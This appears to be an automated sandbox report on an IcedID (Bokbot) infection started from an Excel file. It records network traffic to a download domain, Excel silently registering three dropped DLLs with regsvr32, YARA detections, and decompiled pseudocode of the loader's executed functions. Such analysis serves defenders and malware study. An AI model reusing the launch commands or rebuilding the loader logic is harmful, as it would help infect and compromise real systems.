HTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:35 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=V0j5jRp1Xa598I%2F2xwRpfWsRKAhQ1r6yE6KBvuez42GwH3otQMVwOH%2F50FnO3S6gF0B94X5qe%2FX06UGtyzvxRS%2BPQIW1kkRAFTol6TtjAlVz%2Fgw85Pj9g6IFhxankgiw6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e8e08714e97-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Timestamp: Jul 6, 2021 15:07:35.427238941 CEST; kBytes transferred: 965; Direction: IN; Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                              HTTPS Packets

Timestamp; Source IP; Source Port; Dest IP; Dest Port
Jul 6, 2021 15:07:25.999757051 CEST; 13.224.92.73; 443; 192.168.2.22; 49170
Jul 6, 2021 15:07:29.340223074 CEST; 13.224.92.73; 443; 192.168.2.22; 49172
Jul 6, 2021 15:07:33.521882057 CEST; 13.224.92.73; 443; 192.168.2.22; 49174

JA3 SSL Client Fingerprint (all three connections): 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest (all three connections): 05af1f5ca1b87cc9cc9b25185115607d

Certificate chain (all three connections):
Subject: CN=aws.amazon.com; Issuer: CN=Amazon, OU=Server CA 1B, O=Amazon, C=US; Not Before: Wed Sep 30 02:00:00 CEST 2020; Not After: Thu Sep 23 14:00:00 CEST 2021
Subject: CN=Amazon, OU=Server CA 1B, O=Amazon, C=US; Issuer: CN=Amazon Root CA 1, O=Amazon, C=US; Not Before: Thu Oct 22 02:00:00 CEST 2015; Not After: Sun Oct 19 02:00:00 CEST 2025
Subject: CN=Amazon Root CA 1, O=Amazon, C=US; Issuer: CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US; Not Before: Mon May 25 14:00:00 CEST 2015; Not After: Thu Dec 31 02:00:00 CET 2037
Subject: CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US; Issuer: OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US; Not Before: Wed Sep 02 02:00:00 CEST 2009; Not After: Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

Start time: 15:07:39
Start date: 06/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f4d0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:44
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                              Imagebase:0xff3c0000
                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2101910318.0000000000290000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:47
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                              Imagebase:0xff3c0000
                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2109602309.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:15:07:51
                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                              Imagebase:0xff3c0000
                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000005.00000002.2116608760.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis


                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                			E020D27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                				void* __rdi;
                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                				long long _t46;
                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                				long long* _t67;
                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                				struct HINSTANCE__* _t79;
                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                				char* _t83;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t64 = __rsi;
                                                                                                                                                                                                				_t46 = __rbx;
                                                                                                                                                                                                				_t44 = _t69;
                                                                                                                                                                                                				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                				_push(_t62);
                                                                                                                                                                                                				_t80 = __rcx;
                                                                                                                                                                                                				_t83 = L"; _gid=";
                                                                                                                                                                                                				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                				LoadLibraryA(_t82);
                                                                                                                                                                                                				GetProcAddress(_t79);
                                                                                                                                                                                                				_t67 = _t44;
                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					r9d = 1;
                                                                                                                                                                                                					_t23 = E020D2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20d70c4, _t77, _t78);
                                                                                                                                                                                                					L7:
                                                                                                                                                                                                					return _t23;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t24 =  *_t67(); // executed
                                                                                                                                                                                                				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                					_t36 = _t9;
                                                                                                                                                                                                					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                					_t62 = _t44;
                                                                                                                                                                                                					if(_t44 == 0) {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t54 = _t44; // executed
                                                                                                                                                                                                					_t27 =  *_t67(); // executed
                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                						_t48 = _t62;
                                                                                                                                                                                                						do {
                                                                                                                                                                                                							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                                                                                                                                                                                                								_t35 =  *((intOrPtr*)(_t48 + 0x194));
                                                                                                                                                                                                								if(_t54 - 1 <= 7) {
                                                                                                                                                                                                									r9d = _t35;
                                                                                                                                                                                                									_t18 = _t48 + 0x198; // 0x198
                                                                                                                                                                                                									_t54 = _t80 + _t64 * 2;
                                                                                                                                                                                                									E020D2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                                                                                                                                                                                                									_t64 = _t64 + _t44;
                                                                                                                                                                                                									_t83 = ":";
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t48 =  *_t48;
                                                                                                                                                                                                						} while (_t48 != 0);
                                                                                                                                                                                                						GetProcessHeap();
                                                                                                                                                                                                						_t36 = 0;
                                                                                                                                                                                                						_t23 = HeapFree(??, ??, ??);
                                                                                                                                                                                                						if(_t64 == 0) {
                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                					_t36 = 0;
                                                                                                                                                                                                					HeapFree(??, ??, ??);
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,020D2CFE,?,?,00000003,020D24A4), ref: 020D280F
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,020D2CFE,?,?,00000003,020D24A4), ref: 020D2845
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                • Instruction ID: ce90ee1b4cdd34fe01d72ed3f479fe721de662d5e4ff316b1298d649409267bf
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: C131B475703B809AEB16DBA1E8487997BA1FB45FD4F884125CE0D07B66EF38C189D300
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                • Instruction ID: 3dd131f6e17987a20a00db029caff2fa04089e43dd143b80f72bd45d82a359ba
                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B71D136302B8287EB65CFA6E844BA9BBE1FB48B98F448125DE4E53B54DF38C155C700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 020D233C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                • Instruction ID: dfd17afd4dc01c4529ec7b3ab70d37169eb0578ca3a75b755c849f5c538e7a5c
                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9317E72702B418AEB128FB5E88439D37E4EB48B88F984135DE4D57B1AEF38C149D350
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,020D2CB1,?,?,00000003,020D24A4), ref: 020D16CB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                • Instruction ID: 70d111912c2cbac548599712bfbfc28bbb731f3bcc3c157566cbc322c2b42382
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E218E75317B4083EB468BA2A848369A6B2FB89BC1F888034DE4E87765EF3CC445D700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                			E020D2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                				void* __rbp;
                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                				signed long long _t51;
                                                                                                                                                                                                				signed long long _t52;
                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                				long long _t69;
                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t82 = __r9;
                                                                                                                                                                                                				_t71 = __rsi;
                                                                                                                                                                                                				_t69 = __rdi;
                                                                                                                                                                                                				_t64 = __rdx;
                                                                                                                                                                                                				_t52 = __rbx;
                                                                                                                                                                                                				_t51 = __rax;
                                                                                                                                                                                                				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                				_t73 = _t75 - 0x57;
                                                                                                                                                                                                				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                				_t40 = _t4;
                                                                                                                                                                                                				goto L1;
                                                                                                                                                                                                				L9:
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                				L1:
                                                                                                                                                                                                				asm("rdtsc");
                                                                                                                                                                                                				_t64 = _t64 << 0x20;
                                                                                                                                                                                                				_t51 = _t51 | _t64;
                                                                                                                                                                                                				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                				SleepEx(??, ??); // executed
                                                                                                                                                                                                				_t69 = _t69 - 1;
                                                                                                                                                                                                				if(_t69 != 0) {
                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					wsprintfA();
                                                                                                                                                                                                					E020D11FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                					_t37 = E020D153C(_t73 - 0x29);
                                                                                                                                                                                                					E020D2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                					_t44 = _t51;
                                                                                                                                                                                                					if(_t51 != 0) {
                                                                                                                                                                                                						_t80 = _t73 + 0x67;
                                                                                                                                                                                                						if(E020D1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                								_t27 = E020D272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                								_t41 = _t27;
                                                                                                                                                                                                								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                									GetProcessHeap();
                                                                                                                                                                                                									HeapFree(??, ??, ??);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								E020D1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                								_t49 = _t51;
                                                                                                                                                                                                								if(_t51 != 0) {
                                                                                                                                                                                                									E020D2A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}















                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                • Instruction ID: be7b732fc3a115ffd807d36193623f179b27bc350e9b0e5b024a61a3e29278cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6221AF36302B409AEB21DFB1E8543DD73A2EB48788F884426DE4D5761DEF38D509E750
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,020D1E13), ref: 020D264B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
